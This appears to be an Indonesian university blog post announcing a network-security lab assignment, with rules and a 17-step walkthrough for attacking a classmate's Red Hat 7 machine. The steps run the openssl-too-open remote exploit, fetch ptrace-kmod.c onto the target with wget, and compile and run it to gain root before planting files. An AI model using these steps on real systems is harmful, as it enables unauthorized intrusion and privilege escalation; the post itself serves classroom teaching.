Buat tmen2 yg mengambiL Mata kuLiah Keamanan Jaringan (KamJar), ada TR buat kaLian.....
Usahakan TR yg tmen2 bikin jadi dan bisa bekerja dengan baik, karena bobot nilai TR Keamanan Jaringan cukup besar (15%)
Persyaratan:
* Tiap-tiap kelompok yg sdh dibentuk mempersiapkan 1 PC yang sudah install linux redhat 7 beserta paket2 yang diperlukan. (HARUS DUAL BOOT)
* Pada saat responsi TIDAK MENERIMA ALASAN KUNO seperti “komputer kena virus”, “Linux error”, “lupa”, “tidak tahu”, “belum install Linux”, dll whatever. Komputer adalah TANGGUNG JAWAB KELOMPOK, bukan bentuk komplain atau alasan Anda kepada Asisten!!!
• Responsi dilakukan PER ORANG, jadi jangan harap hanya bisa NUMPANG NAMA!
Persiapkan diri masing-masing!!
* Pastikan tidak mengaktifkan firewall ataupun anti virus
* Tools2 yang akan digunakan untuk serang-serangan sudah terinstall dan dpt bekerja 100%
Aturan :
1. Diperbolehkan max 2 kali tukar-menukar password, lebih dari itu tdk dinilai
2. Diperbolehkan hanya menyisipkan file pd komputer target, tdk blh melakukan aksi yg lain. karena dpt merugikan orang lain dan diri sendiri
3. Apabila ada tindakan lain selain yang tercantum pada aturan 2, nilai dipotong setengah
4. Pastikan port2 yg aktif adalah FTP, SSH, TELNET, HTTP
5. Lakukan perintah nmap untuk melihat port2 yang aktif pada komputer sendiri maupun kmptr orang lain
6. Aturan2 tambahan akan dibahas di kelas...
waktu responsi tanggaL 29 Maret-4 ApriL 2010 (tidak ada responsi susuLan, tidak ikut responsi berarti tidak dapet niLe TR....)
Usahakan buat tmen2 yg ikut kegiatan seperti seminar / workshop ato apaLah....kLo bisa dicanceL dLu...
Tidak ada responsi susuLan apapun aLasannya....(kLo sakit harus ada surat dokter, tidak ada surat dokter berarti absen......)
kLo masih ada yg bingung tentang penggunaan SSH, TeLnet, ExpLoit....
ada caranya.....
Langkah - langkah penyerangannya pada linux redhat 7:
1. Pastikan paket openssl-too-open sudah terinstall pada komputer linux anda. Kalo blm ada silahkan download dari komputer source yang sudah terdapat paket tersebut. Gunakan perintah wget pada konsole / terminal. Tetapi sebelumnya, pastikan bahwa di komputer linux anda service httpnya udah aktif. Perintahnya : wget http://alamat_ip_komp_source/file_yg_mau didownload /directory_yg mau disimpan. Contohnya : wget http://192.168.32.1/openssl-too-open.tar.gz /home
2. Pastikan file openssl-too-open.tar.gz yg td di download sudah ada di direktori home. Gunakan perintah ls -l.
3. Masuk ke direktori home perintahnya cd /home, lalu ekstrak file tersebut. Gunakan perintah : tar -zxvf openssl-too-open.tar.gz untuk mengekstrak.
4. Cek hasil ekstrakan tersebut, gunakan perintah ls -l.
5. Masuk ke direktory openssl-too-open, gunakan perintah cd openssl-too-open
6. Install paket tersebut, gunakan perintah make
7. Lakukan Scanning ke komputer target, gunakan perintah ./openssl-scanner -c alamat_ip_target
8. Masuk ke komputer target, gunakan perintah telnet alamat_ip_target
9. Setelah itu, jalankan openssl, gunakan perintah ./openssl-too-open -a -0x0b -v ip_kompt_target
10. Cek hak akses anda, gunakan perintah whoami
11. Klo hak akses anda blm root pada komputer target, ubah hak akses menjadi root. Masuk ke directory tmp. Gunakan perintah cd /tmp
12. Download file ptrace-kmod.c dari komputer kita dan letakkan file tersebut di direktori tmp pada komputer target. gunakan perintah wget http://alamat_ip_anda/ptrace-kmod.c /tmp
13. Eksekusi file tersebut, gunakan perintah gcc ptrace-kmod
14. ls -l untuk melihat hasil eksekusi tersebut. Pastikan ada file a.out
15. Ubah permission hak akses a.out. Gunakan perintah chmod +x a.out atau chmod 777 a.out
16. Jalankan file a.out, gunakan perintah ./a.out
17. Cek status anda, gunakan perintah whoami. Klo udah root, silahkan sisipkan file di direktori yg anda inginkan.
kLo ada yg bLom dapet fiLe openssl-too-open dan ptrace-kmod.c tmen2 bisa donLot:
DownLoad openssl-too-open
DownLoad ptrace-kmod.c
Tidak ada komentar:
Posting Komentar